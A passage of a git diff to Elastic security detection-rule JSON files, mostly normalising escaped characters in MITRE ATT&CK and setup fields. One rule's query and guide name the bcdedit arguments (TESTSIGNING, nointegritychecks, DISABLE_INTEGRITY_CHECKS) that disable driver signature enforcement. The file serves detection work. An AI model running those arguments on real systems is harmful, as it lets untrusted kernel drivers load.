+ "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n",
 "related_integrations": [
 {
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json
index dd1dd2fdea3..7066a1f5db1 100644
--- a/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/b43570de-a908-4f7f-8bdb-b2df6ffd8c80_5.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Code Signing Policy Modification Through Built-in tools",
- "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Built-in tools\n\nWindows Driver Signature Enforcement (DSE) is a security feature introduced by Microsoft to enforce that only signed drivers can be loaded and executed into the kernel (ring 0). This feature was introduced to prevent attackers from loading their malicious drivers on targets. If the driver has an invalid signature, the system will not allow it to be loaded.\n\nThis protection is essential for maintaining the security of the system. However, attackers or even administrators can disable this feature and load untrusted drivers, as this can put the system at risk. Therefore, it is important to keep this feature enabled and only load drivers from trusted sources to ensure the integrity and security of the system.\n\nThis rule identifies commands that can disable the Driver Signature Enforcement feature.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the command was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name: \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and process.args: (\"-set\", \"/set\") and \n process.args: (\"TESTSIGNING\", \"nointegritychecks\", \"loadoptions\", \"DISABLE_INTEGRITY_CHECKS\")\n",
 "related_integrations": [
 {
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json
index 20905ccf7d9..1be4f94e3f2 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_102.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json
index 3c9e76a0ae4..8c8c1caf15c 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json
index 78b251693df..eb598a38f35 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_104.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json
index 220bb988603..d98e90fe28a 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4449455-f986-4b5a-82ed-e36b129331f7_105.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json
index a78914d0f47..5cd2659c2b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_102.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json
index aa8a38e4db4..7e3106c0e7a 100644
--- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json
index 37c0a192fb4..787a6a6079b 100644
--- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_104.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json
index b0bd516b24f..58a83259144 100644
--- a/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_205.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json
index a7aedc3c3ff..3e7919d7d9b 100644
--- a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json
index 633c423c599..08683a5837c 100644
--- a/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/b483365c-98a8-40c0-92d8-0458ca25058a_2.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json
index 5ae2fc6406a..41d70c24370 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_102.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json
index ae1bdc89409..202193c5eee 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_103.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json
index 858f057e94a..1fc6ab4df91 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_104.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json
index af9f190ce26..4be09e70ad2 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_105.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json
index 6b08b59b6a7..36c984c40fd 100644
--- a/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9_206.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json
index 165bf688637..c76d9bba132 100644
--- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_1.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json
index a772db305f0..6edb60000fd 100644
--- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_2.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json
index b3da2cbea79..9372d84a1b5 100644
--- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_3.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json
index d91170fddb2..f12a0fe0cc0 100644
--- a/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/b51dbc92-84e2-4af1-ba47-65183fcd0c57_4.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json
index 9168186d1cd..8748b1b976c 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_104.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json
index 51f3a575cd1..73701673466 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_105.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json
index 2762a309d24..375e0205a13 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_106.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
